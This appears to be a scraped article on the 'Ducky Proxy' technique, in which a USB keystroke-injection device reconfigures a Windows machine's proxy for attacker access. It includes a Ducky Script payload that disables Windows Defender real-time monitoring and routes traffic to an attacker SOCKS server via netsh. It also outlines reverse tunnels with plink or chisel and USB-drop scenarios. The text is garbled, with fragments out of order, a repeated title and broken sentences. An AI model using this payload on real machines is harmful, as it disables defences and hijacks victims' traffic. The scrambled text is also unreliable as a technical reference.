REM Title: Ducky Proxy - SOCKS Tunneling via Netsh DELAY 3000 GUI r DELAY 500 STRING cmd CTRL-SHIFT ENTER DELAY 1000 ALT y DELAY 500 REM Disable Windows Defender Real-time Monitoring STRING powershell Set-MpPreference -DisableRealtimeMonitoring $true ENTER DELAY 500
| Feature | Standard USB Ducky | Ducky Proxy Technique | | :--- | :--- | :--- | | | Requires physical return or upload to a public pastebin | Real-time via proxy logs | | Persistence | One-time payload | Continuous traffic interception | | Anonymity | Victim’s IP is exposed to the internet | Attacker hides behind victim’s IP | | Post-Exploitation | Hard to modify script after execution | Attacker can change proxy rules live | ducky proxy
REM Configure WinHTTP Proxy to attacker's SOCKS server (Listens on 127.0.0.1:9050 after SSH) STRING netsh winhttp set proxy proxy-server="socks=192.168.1.50:1080" bypass-list="*.local" ENTER DELAY 500 REM Title: Ducky Proxy - SOCKS Tunneling via
Whether you are a red teamer trying to establish an egress channel from a locked-down air-gapped machine, or a blue teamer trying to understand how an attacker bridges physical access to remote command and control (C2), understanding the Ducky Proxy is critical. Real-World Applications (Ethical & Malicious) 1
In advanced Ducky Proxy setups, the script instructs the victim to connect to a remote proxy using a tool like plink.exe (PuTTY Link) or chisel to create a SOCKS tunnel back to the attacker. This turns the victim into a node in the attacker's private network. Real-World Applications (Ethical & Malicious) 1. Red Teaming Air-Gapped Networks Imagine a secure facility with no WiFi and strict egress filtering. A red teamer drops a Ducky Proxy device in the parking lot. An employee picks it up and plugs it into their workstation out of curiosity. The script configures the machine to use a proxy on an unexpected port (e.g., 443 SSL) that bypasses the outbound firewall. The red team now has a live C2 channel. 2. Bypassing Captive Portals In hotels or universities, a Ducky Proxy can automate accepting the captive portal terms and then setting up an SSH tunnel back home, allowing the attacker to use the victim's authenticated session. 3. Malware Distribution Instead of downloading a large malware binary (which triggers AV), the Ducky Proxy script downloads a tiny proxy client. Once the proxy is active, the attacker browses the web via the victim. The victim never sees a malicious executable, only a change in network settings. The Technical Deep Dive: Crafting a Ducky Proxy Script For educational purposes, a simple Ducky Proxy script for Windows might look like this (using Ducky Script 3.0):
For defenders, the answer lies in behavioral analytics (HID speed detection) and strict USB policy enforcement. For red teamers, the Ducky Proxy is an essential tool in the mission to prove that physical security is inextricably linked to network security.
This article dissects what a Ducky Proxy is, how it works, its legitimate uses in penetration testing, and the defensive measures required to stop it. The term "Ducky Proxy" is not a single commercial product but rather a technique or scripted attack methodology . It refers to the use of a USB keystroke injection tool (like a Rubber Ducky, Digispark, or Flipper Zero) to automate the configuration of a device's proxy settings.